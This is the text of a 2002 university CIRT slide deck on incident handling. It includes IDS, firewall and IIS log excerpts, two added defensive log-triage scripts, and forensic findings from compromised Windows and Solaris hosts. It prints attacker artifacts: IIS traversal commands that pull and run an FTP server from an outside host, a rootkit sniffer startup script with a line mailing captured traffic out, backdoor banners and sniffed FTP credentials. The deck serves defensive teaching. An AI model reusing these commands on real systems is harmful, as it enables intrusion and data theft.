Adventures In Incident Handling. Paul Asadoorian, GCIA, Brown University. August 16, 2002, MIT Security Camp. Outline: Incident Handling @ Brown University; Incident Discovery Processes; Containing the damage; Analyzing the results; Recovery; Learning from the experiences.

Adventures In Incident Handling
Paul Asadoorian, GCIA
Brown University
August 16, 2002
MIT Security Camp

Outline
• Incident Handling @ Brown University
• Incident Discovery Processes
• Containing the damage
• Analyzing the results
• Recovery
• Learning from the experiences
Paul Asadoorian, Brown University CIRT

The Brown University CIRT
• CIRT (Computer Incident Response Team)
• Formed in mid-December 2001
• Consists of members of technical teams and management within the computing and information services department

The Brown University CIRT
• Identify categories of malicious activity threatening Brown University's computing and information services
• Coordinate appropriate responses to counter malicious threats
• Codify group level response procedures so that there is archival documentation and understanding of roles across CIS groups

The Brown University CIRT
• Review and recommend appropriate new policy or updates to existing policies to CIS management
• Be aware of developing security issues affecting computing and information services
• Work with the Help Desk and Computer Education to raise users' awareness of computing best practices and security issues

The Brown University CIRT
• Respond to incidents using the six-step process:
  • Preparation
  • Identification
  • Containment
  • Eradication
  • Recovery
  • Lessons Learned
• Primary Incident Handlers:
  • Paul Asadoorian
  • Suzanne Coski

CIRT - Authorization
• Get permission
• Security Assessment and Audit Authorization:
  “When requested, any access required for the purpose of performing an audit or responding to a computer security incident will be provided to members of Brown University's Information Security team.”
• Also permits use of “legitimate” security auditing tools

CIRT – Remedy Form

CIRT – Jump Bag
• Laptop with appropriate software
• Networking hub and cables
• Cell phone
• Campus phone directory
• Linux/Windows boot disks
• Operating system CDs
• Tape/Disk/CDRW backup media

Local Contacts
• Strengthened Brown’s Systems Administrators group
• Monthly meetings and newsletters
• Email: SysAdmins@brown.edu
• Web: http://www.brown.edu/Research/SysAdmins/

Contacting CIRT
• Email: CIRT@brown.edu
• Web: http://www.brown.edu/Facilities/CIS/CIRT/

Incident Discovery
• Intrusion Detection System
• Logs (Firewall, Systems, Routers)
• 3rd Party
• Panicking Systems Administrators

Incident Discovery: IDS
• Currently monitoring all incoming and outgoing Internet and Internet2 traffic
• Spikes up to 300mb/s
• Does not catch attacks that occur on campus only

Incident Discovery: IDS
• Snort (www.snort.org)
• TopLayer Networks IDS Load Balancer (www.toplayer.com)
• MySQL, ACID, Apache, SSH
• SSH for rule management

Incident Discovery: IDS
#(1 - 2420) [2002-07-02 11:52:25] [arachNIDS/287] FTP EXPLOIT wu-ftpd 2.6.0 linux overflow
IPv4: 203.184.173.249 -> MY.SUB.NET.8
      hlen=5 TOS=48 dlen=350 ID=7510 flags=0 offset=0 TTL=46 chksum=8390
TCP:  port=36269 -> dport: 21 flags=***AP*** seq=2161363806
      ack=3044544837 off=5 res=0 win=5840 urp=0 chksum=65114
Payload: length = 301

Incident Discovery: IDS
#(5 - 51010) [2002-07-22 14:23:36] ATTACK RESPONSES id check returned Root
IPv4: MY.SUB.NET.126 -> 202.100.254.163
      hlen=5 TOS=0 dlen=76 ID=53672 flags=0 offset=0 TTL=63 chksum=58344
TCP:  port=22 -> dport: 1060 flags=***AP*** seq=306540118
      ack=513337267 off=8 res=0 win=31856 urp=0 chksum=64269
      Options:
       #1 - NOP len=0
       #2 - NOP len=0
       #3 - TS len=10 data=074F58920054721D
Payload: length = 24
000 : 75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D   uid=0(root) gid=
010 : 30 28 72 6F 6F 74 29 0A                           0(root).

Incident Discovery: IDS
Jul 22 15:17:08 mtsnow snort: [1:1326:1] EXPLOIT ssh CRC32 overflow NOOP [Classification: Executable code was detected] [Priority: 1]: {TCP} 202.100.254.163:1040 -> MY.SUB.NET.126:22
<Repeats 9 more times>
Jul 22 14:23:36 crestedb snort: [1:498:2] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} MY.SUB.NET.126:22 -> 202.100.254.163:1060

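The two alerts on this slide only become a confirmed compromise when read together: an inbound EXPLOIT alert and an outbound ATTACK RESPONSES alert on the reversed address pair and the same service port. The triage below is an added example, not part of the original slides; the log lines are constructed in the slide's format with documentation addresses, and the `campus` network and verdict labels are assumptions. It matches on addresses and port only, not on time order, because the slide shows the response logged by a different sensor with an earlier timestamp than the exploit alert.

```python
import ipaddress
import re

# Snort syslog alert layout as it appears on the slide.
ALERT_RE = re.compile(
    r"^\w{3}\s+\d+\s[\d:]{8}\s(?P<sensor>\S+)\ssnort:\s\[\d+:(?P<sid>\d+):\d+\]\s"
    r"(?P<msg>.*?)\s\[Classification:\s[^\]]+\]\s\[Priority:\s\d+\]:\s"
    r"\{\w+\}\s(?P<src>[\d.]+):(?P<sport>\d+)\s->\s(?P<dst>[\d.]+):(?P<dport>\d+)$"
)

# Constructed sample: 192.0.2.0/24 stands in for the campus network.
SAMPLE_ALERTS = """\
Jul 22 15:17:08 mtsnow snort: [1:1326:1] EXPLOIT ssh CRC32 overflow NOOP [Classification: Executable code was detected] [Priority: 1]: {TCP} 203.0.113.163:1040 -> 192.0.2.126:22
Jul 22 14:23:36 crestedb snort: [1:498:2] ATTACK RESPONSES id check returned root [Classification: Potentially Bad Traffic] [Priority: 2]: {TCP} 192.0.2.126:22 -> 203.0.113.163:1060
Jul 22 16:02:11 mtsnow snort: [1:1326:1] EXPLOIT ssh CRC32 overflow NOOP [Classification: Executable code was detected] [Priority: 1]: {TCP} 203.0.113.163:1044 -> 192.0.2.40:22
Jun 16 16:51:27 moab snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} 192.0.2.244:1332 -> 198.51.100.83:1
""".splitlines()


def parse(line):
    """Return the alert fields as a dict, or None if the line is not an alert."""
    match = ALERT_RE.match(line.strip())
    return match.groupdict() if match else None


def triage(lines, campus="192.0.2.0/24"):
    """Pair inbound EXPLOIT alerts with outbound ATTACK RESPONSES alerts."""
    net = ipaddress.ip_network(campus)

    def inside(ip):
        return ipaddress.ip_address(ip) in net

    exploits, responses = {}, set()
    for alert in filter(None, map(parse, lines)):
        src, dst = alert["src"], alert["dst"]
        if alert["msg"].startswith("EXPLOIT") and inside(dst) and not inside(src):
            # key: (attacker, victim, attacked service port)
            exploits.setdefault((src, dst, alert["dport"]), set()).add(alert["sensor"])
        elif alert["msg"].startswith("ATTACK RESPONSES") and inside(src) and not inside(dst):
            # the response leaves from the attacked port back to the attacker
            responses.add((dst, src, alert["sport"]))

    report = []
    for (attacker, victim, port), sensors in exploits.items():
        report.append({
            "victim": victim,
            "port": int(port),
            "attacker": attacker,
            "verdict": "response-seen" if (attacker, victim, port) in responses else "attempt-only",
            "sensors": sorted(sensors),
        })
    # hosts that answered the attacker sort first
    return sorted(report, key=lambda r: (r["verdict"] != "response-seen", r["victim"]))


if __name__ == "__main__":
    for row in triage(SAMPLE_ALERTS):
        print(row)
```
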
Incident Discovery: Firewall Logs
• Firewall protects our critical infrastructure
• Isolated subnet with no machines
• Simply logs any traffic going to this subnet
• Approx 90,000 packets logged per month

Incident Discovery: Firewall Logs
Jul 24 00:14:57 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="07/24/2002 00:06:13" src=MY.SUB.NET.13 dst=216.200.107.27 src_port=2444 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin
Jul 24 00:14:59 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="07/24/2002 00:06:16" src=MY.SUB.NET.13 dst=216.200.107.27 src_port=2444 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin
Aug 5 09:01:38 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="08/05/2002 08:52:41" src=MY.SUB.NET.13 dst=129.250.156.30 src_port=3661 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin
Aug 5 09:01:40 fw.brown.edu ns1000: NetScreen Traffic Log: device_id=91010053 start_time="08/05/2002 08:52:44" src=MY.SUB.NET.13 dst=129.250.156.30 src_port=3661 dst_port=80 service=http proto=6 policy_id=88 direction=outgoing duration=0 sent=0 rcvd=0 action=Deny vsys=admin

Incident Discovery: System Logs
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [100]USER, user1,,
216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 204, 0, 0, 530, 1326, [100]PASS, -, -,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [101]USER, user1,,
216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 141, 0, 0, 530, 1326, [101]PASS, -, -,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 15, 0, 0, 331, 0, [100]USER, user1, -,
216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326, [100]PASS, -, -,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [101]USER, user1,-,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [102]USER, user1, -,
216.167.77.217, user1, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 331, 0, [103]USER, user1, -,
216.167.77.217, -, 3/6/02, 18:11:32, MSFTPSVC1, SRVNAME, MY.SUB.NET.10, 0, 0, 0, 530, 1326, [101]PASS, -, -,

Incident Discovery: System Logs
3/6/02 6:14:45 PM Security Failure Audit Logon/Logoff 539 NT AUTHORITY\SYSTEM <System Name>
Logon Failure:
  Reason: Account locked out
  User Name: ftptest
  Domain: WIN07147
  Logon Type: 3
  Logon Process: KSecDD
  Authentication Package: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
  Workstation Name: \\WIN07147

Incident Discovery: System Logs
2002-03-24 21:13:08 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\command.exe 502
2002-03-24 21:13:11 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+nltestsite>>c:\config.txt 502
2002-03-24 21:13:13 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+nolimit>>c:\config.txt 502
2002-03-24 21:13:18 204.141.115.253 - MY.SUB.NET.233 80 GET /scripts/..%5c../command.exe /c+echo+get%20/secret/ServUDaemon.ini%20c:\test.ini>>c:\config.txt 502

copy c:\winnt\system32\cmd.exe c:\command.exe
Echo nltestsite>>c:\config.txt
Echo nolimit>>c:\config.txt
Echo get /secret/ServUDaemon.ini c:\test.ini>>c:\config.txt
Echo get /secret/dirchange.tx c:\dirchange.txt>>c:\config.txt
Echo binary>>c:\config.txt
Echo get /secret/ServUDaemon.exe c:\test.exe>>c:\config.txt
Echo bye>>c:\config.txt
ftp.exe -s:c:\config.txt nltestsite.hypermart.net
Mkdir c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501
Copy c:\test.exe c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\LSASS.exe
Copy c:\test.ini c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\WINNT.dll
Copy c:\dirchange.txt c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\system32.dll
del+c:\test.ini
del+c:\test.exe
del+c:\config.txt
dir+c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501
del+c:\config.txt
del+c:\config.txt
c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\LSASS.exe c:\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\WINNT.dll

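The command list above is what falls out of the IIS log once the URI query of each traversal request is decoded. The script below is an added example, not part of the original slides: it rebuilds that per-client command timeline from log lines in the field order shown on the previous slide. The sample lines are constructed from the slide's requests with documentation addresses, the function names are assumptions, and repeated percent-decoding is a generalization beyond the single `%5c` encoding seen in the log.

```python
import re
from urllib.parse import unquote

# Constructed sample, modelled on the slide's log lines. Field order:
# date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status
# Addresses are documentation ranges, not the ones from the incident.
SAMPLE_LOG = r"""
2002-03-24 21:13:08 198.51.100.7 - 192.0.2.233 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\command.exe 502
2002-03-24 21:13:09 198.51.100.9 - 192.0.2.233 80 GET /index.html - 200
2002-03-24 21:13:11 198.51.100.7 - 192.0.2.233 80 GET /scripts/..%5c../command.exe /c+echo+nltestsite>>c:\config.txt 502
2002-03-24 21:13:18 198.51.100.7 - 192.0.2.233 80 GET /scripts/..%5c../command.exe /c+echo+get%20/secret/ServUDaemon.ini%20c:\test.ini>>c:\config.txt 502
""".strip().splitlines()


def decode(text, rounds=3):
    """Turn '+' into spaces, then percent-decode until the text stops changing."""
    text = text.replace("+", " ")
    for _ in range(rounds):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    return text


def reconstruct(lines):
    """Return {client_ip: [(timestamp, status, command), ...]} for requests
    whose decoded path climbs out of the web root and names an executable."""
    sessions = {}
    for line in lines:
        fields = line.split()
        if len(fields) != 10:
            continue  # not in the expected 10-field layout
        date, time, client, _user, _sip, _port, _method, stem, query, status = fields
        # Normalise the path so '..\' and '../' are treated alike.
        path = decode(stem).replace("\\", "/").lower()
        if "../" not in path or not path.endswith(".exe"):
            continue
        args = decode(query)
        # Drop the leading '/c' switch passed to the command interpreter.
        match = re.match(r"/c\s+(.*)", args, re.IGNORECASE)
        command = match.group(1) if match else args
        # The status is reported as logged; it is not used to judge success.
        sessions.setdefault(client, []).append((f"{date} {time}", status, command))
    return sessions


if __name__ == "__main__":
    for client, entries in reconstruct(SAMPLE_LOG).items():
        print(client)
        for stamp, status, command in entries:
            print(f"  {stamp}  [{status}]  {command}")
```
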
Incident Discovery: Router Logs
Jul 30 17:49:19 router.mydomain.edu 10124: Jul 30 16:49:18: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 193.0.0.11 (0/0), 2 packets
Jul 30 18:51:22 router.mydomain.edu 10173: Jul 30 17:51:21: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 217.151.0.18 (0/0), 1 packet
Jul 30 18:52:37 router.mydomain.edu 10176: Jul 30 17:52:36: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.6 (GigabitEthernet4/0/0 00d0.bcee.8ec0) -> 68.59.35.47 (0/0), 1 packet
Jul 30 18:55:32 router.mydomain.edu 10179: Jul 30 17:55:31: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 128.8.7.4 (0/0), 1 packet
Jul 30 18:57:21 router.mydomain.edu 10181: Jul 30 17:57:20: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.66 (GigabitEthernet4/0/0 0030.b6d2.08fc) -> 217.151.0.18 (0/0), 5 packets
Jul 30 18:58:21 router.mydomain.edu 10182: Jul 30 17:58:20: %SEC-6-IPACCESSLOGDP: list 104 denied icmp 10.1.1.6 (GigabitEthernet4/0/0 00d0.bcee.8ec0) -> 68.59.35.47 (0/0), 2 packets

Incident Discovery: 3rd party
You are receiving this notice since your address is listed as the contact in the ARIN database for IP address MY.SUB.NET.79.

The following Nimda Worm intrusion attempt was made against SOMEONEELSESDOMAIN.COM.

DATE/TIME: Aug-13-2002 (05:52:00) [UTC]
SOURCE   : MY.SUB.NET.79
DEST     : 172.213.167.32
ATTEMPT  : /scripts/root.exe?/c+dir

Please advise your user that their system has been compromised and is being actively utilized as an attack launchpoint against other systems.

Thank you for your prompt attention to this matter.

-Early Bird v2.6 (http://www.treachery.net/earlybird/)

Incident Discovery: Panicking Systems Administrator
• I “Think” I’ve been hacked
• I’ve been hacked, help!
• I was hacked, didn’t I tell you?

(ASCII-art banner)

you can stop one, but you can NOT stop all of us!

-------### Powered By X-ORG ###-------
-------### ###-------
-------### ToRn, Danny-Boy, Apache ###-------
-------### Dimfate, Angelz, Annihilat ###-------
-------### JNX, _random, Beast ###-------
-------### W_Knight, Markland ###-------
-------### |mojo69| ###-------

Dear System Admin,

Your system was recently compromised by X-ORG.. We patched the security hole used to compromise your system, Please note, no data on your system was stolen or damaged in any shape of form, nor was this ever our intention. We simply installed some backdoors to permit us to access to the system again.

If you would like to contact us regarding any security issues or even simply for a chat, please email..XORG@mailroom.com or you can find us on #etcpub @ IRCnet.

X-Organisation.
"IN THE NAME OF BEXTER!"
- EOF -
X-Org SunOS Rootkit v2.5DXE - By JudgeD/Danny-Boy

Containing the damage
• Filter from the network on local router
• Prefer port disabling on switch
• Tracking and clean-up
• Hey I got a new address and I can’t get to the Internet?

Analyzing the results: Windows
bash-2.05# nmap -p1-65535 MY.SUB.NET.144
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on host.domain.myuniv.edu (MY.SUB.NET.144):
(The 65529 ports scanned but not shown below are in state: closed)
Port       State       Service
135/tcp    open        loc-srv
139/tcp    open        netbios-ssn
1029/tcp   open        ms-lsa
1031/tcp   open        iad2
6129/tcp   open        unknown
7614/tcp   open        unknown
Nmap run completed -- 1 IP address (1 host up) scanned in 31 seconds

Analyzing the results: Windows
• Connect to ports and see what’s interesting:
bash-2.05# nc MY.SUB.NET.144 7614
"Wollf Remote Manager" v1.4
Code by wollf, http://www.xfocus.org
[500105@C:\WINNT\system32]#

Analyzing the Results: Windows
Starting nmap V. 3.00 ( www.insecure.org/nmap/ )
Interesting ports on host.mydomain.edu (MY.SUB.NET.84):
(The 65528 ports scanned but not shown below are in state: closed)
Port       State       Service
113/tcp    open        auth
135/tcp    open        loc-srv
139/tcp    open        netbios-ssn
445/tcp    open        microsoft-ds
1027/tcp   open        IIS
1517/tcp   open        vpac
57970/tcp  open        unknown
Nmap run completed -- 1 IP address (1 host up) scanned in 65 seconds

Analyzing the Results: Windows
bash-2.05# nc MY.SUB.NET.84 57970
220-Serv-U FTP Server v3.0 for WinSock ready...
220-
220--Server Stats
220-Uptime: 5 days 15 hours 4 mins
220-Files downloaded: 76 Total: 952044 Kb
220-Files uploaded: 326 Total: 7621646 Kb
220-Current Speed: 0.000 Kb/sec
220-Average Speed: 17.632 Kb/sec
220-
220--User Stats
220-Users logged in: 1 / -1
220-Total logged in users: 61
220-Users in last 24hrs: 7
220-
220-################################

Analyzing the Results: Windows
• What we find:
  • LSASS.exe
  • ispc.exe
  • system32.dll
  • SERVICES.EXE
  • nc.exe
  • xdcc
  • ServUStartUpLog.txt
  • servudaemon.ini
  • xdcc.bat
  • Slave.exe
  • srvany.exe

Analyzing the Results: Windows
• ServU-FTP Server
• IROffer – IRC BOT to distribute files
• Fire Daemon – Run any program as a service

Analyzing the Results: Windows
• Hiding in the trash:
@echo off
c:
cd\RECYCLER\S-1-5-21-1065036112-524770614-4547331-501\xdcc
iroffer.exe my.config

Analyzing the Results: Windows
• Movies
• Video Games
• Software
• Adult Material

Analyzing the Results: Windows
• How they get in:
  • NetBIOS Null Sessions
  • Blank or weak Administrator passwords
  • Unpatched IIS Servers

Analyzing the Results: Unix
Jun 16 16:51:27 moab snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.244:1332 -> 195.210.91.83:1
Jun 16 16:51:27 tsali snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.23:1702 -> 195.210.91.83:4
Jun 16 12:08:42 mtsnow snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.54:1853 -> 195.210.91.83:3
Jun 16 12:18:25 vail snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.75:1639 -> 195.210.91.83:10113
Jun 16 16:51:27 durango snort: [1:241:2] DDOS shaft synflood [Classification: Attempted Denial of Service] [Priority: 2]: {TCP} MY.SUB.NET.68:1893 -> 195.210.91.83:5

Analyzing the Results: Unix
#(1 - 260297) [2002-06-25 01:51:43] [arachNIDS/05] SCAN nmap fingerprint attempt
IPv4: 212.41.197.9 -> MY.SUB.NET.55
TCP:  port=36454 -> dport: 7 flags=**U*P*SF seq=1150844814

#(2 - 251812) [2002-06-25 00:46:39] [arachNIDS/28] SCAN nmap TCP
IPv4: 212.41.197.9 -> MY.SUB.NET.55
TCP:  port=36455 -> dport: 7 flags=***A**** seq=1927116476

#(2 - 251813) [2002-06-25 00:47:07] [arachNIDS/05] SCAN nmap fingerprint attempt
IPv4: 212.41.197.9 -> MY.SUB.NET.55
TCP:  port=36454 -> dport: 7 flags=**U*P*SF seq=1150844814

#(3 - 259687) [2002-06-25 06:23:10] [arachNIDS/28] SCAN nmap TCP
IPv4: 212.41.197.9 -> MY.SUB.NET.55
TCP:  port=36457 -> dport: 1 flags=***A**** seq=1927116476

Analyzing the Results: Unix
#(5 - 254473) [2002-06-25 04:26:55] [Bugtraq/2347] [CVE/CVE-2001-0144] EXPLOIT ssh CRC32 overflow /bin/sh
IPv4: 62.211.128.72 -> MY.SUB.NET.55
      hlen=5 TOS=48 dlen=473 ID=58947 flags=0 offset=0 TTL=46 chksum=43204
TCP:  port=1527 -> dport: 22 flags=***AP*** seq=1074100681
      ack=3278036958 off=8 res=0 win=16060 urp=0 chksum=62278
      Options:
       #1 - NOP len=0
       #2 - NOP len=0
       #3 - TS len=10 data=02AD419900648C52
Payload: length = 421

Analyzing the Results: Unix
#(3 - 260901) [2002-06-25 18:35:41] ATTACK RESPONSES id check returned root
IPv4: 206.252.192.195 -> MY.SUB.NET.55
      hlen=5 TOS=0 dlen=1500 ID=64118 flags=0 offset=0 TTL=53 chksum=47327
TCP:  port=6667 -> dport: 32885 flags=***A**** seq=3486885204
      ack=1549233503 off=5 res=0 win=8610 urp=0 chksum=45928
Payload: length = 1460
<snip>
510 : 6E 65 74 20 4B 6F 62 65 7C 65 73 5A 7C 20 48 40   net Kobe|esZ| H@
520 : 20 3A 30 20 75 69 64 3D 30 28 72 6F 6F 74 29 20    :0 uid=0(root) 
530 : 67 69 64 3D 30 28 72 6F 6F 74 29 0D 0A 3A 69 72   gid=0(root)..:ir
540 : 63 2D 31 2E 73 74 65 61 6C 74 68 2E 6E 65 74 20   c-1.stealth.net 
550 : 33 35 32 20 4D 6F 6E 69 6E 6F 20 23 69 67 6E 6F   352 Monino #igno
560 : 74 6F 20 7E 69 72 63 6E 65 74 20 32 31 33 2D 31   to ~ircnet 213-1
570 : 34 30 2D 31 32 2D 32 31 38 2E 66 61 73 74 72 65   40-12-218.fastre
580 : 73 2E 6E 65 74 20 2A 2E 65 64 69 73 6F 6E 74 65   s.net *.edisonte
<snip>

Analyzing the Results: Unix
bash-2.05# nmap -sS -p1-65535 MY.SUB.NET.55
Starting nmap V. 2.53 by fyodor@insecure.org (www.insecure.org/nmap/ )
Interesting ports on marcia.geo.brown.edu (MY.SUB.NET.55):
(The 65491 ports scanned but not shown below are in state: closed)
Port       State       Service
<Snip>
22/tcp     open        ssh
23/tcp     open        telnet
25/tcp     open        smtp
<Snip>
8888/tcp   open        sun-answerbook
9010/tcp   open        unknown
22273/tcp  open        wnn6
25000/tcp  open        unknown
32771/tcp  open        sometimes-rpc5
<Snip>

Analyzing the Results: Unix
bash-2.05# telnet MY.SUB.NET.55 25000
Trying MY.SUB.NET.55...
Connected to MY.SUB.NET.55.
Escape character is '^]'.
SSH-1.5-1.2.25
^]

Analyzing the Results: Unix
• /dev/pts/01
  • Rootkit
• /dev/prom
  • Sn.l
  • dos
• /usr/lib
  • Ldlibnet.so
  • Lpstart
  • Lpset

Analyzing the Results: Unix
Lpstart:
set EMAIL_ADDRESS angelz1578@usa.net
touch /dev/prom/sn.l
#cat /dev/prom/sn.l|mail ${EMAIL_ADDRESS} >/dev/null
echo "Restart on `date`" >>/dev/prom/sn.l
if test -f /dev/prom/dos ;then
cd /usr/lib
./lpq
fi
nohup /usr/lib/lpset -s -d 512 -i /dev/eri -o /dev/prom/sn.l >/dev/null &

Analyzing the Results: Unix
Contents of /dev/prom/sn.l:
-- TCP/IP LOG -- TM: Tue Jun 25 06:31:17 --
PATH: 163.178.101.249(ftp) => marcia(ftp)
STAT: Tue Jun 25 06:31:17, 2 pkts, 0 bytes [TH_RST]
DATA:
--
-- TCP/IP LOG -- TM: Tue Jun 25 08:16:38 --
PATH: roc-24-24-47-93.rochester.rr.com(ftp) => marcia(ftp)
STAT: Tue Jun 25 08:16:39, 2 pkts, 0 bytes [TH_RST]
DATA:
--

Analyzing the Results: Unix
-- TCP/IP LOG -- TM: Tue Jun 25 05:54:50 --
PATH: hackedsystem(32873) => hacker.ftpsite.com(ftp)
STAT: Tue Jun 25 05:55:50, 33 pkts, 232 bytes [TH_FIN]
:
DATA: USER reiregna
: PASS assamalaka
: CWD images
: PORT MY,SUB,NET,55,128,106
: RETR sunpsy.tgz
: PORT MY,SUB,NET,55,128,107
: NLST -al
: PORT MY,SUB,NET,55,128,108
: RETR sun.tgz
: TYPE I
: PORT MY,SUB,NET,55,128,109
: RETR sunpsy.tgz
: QUIT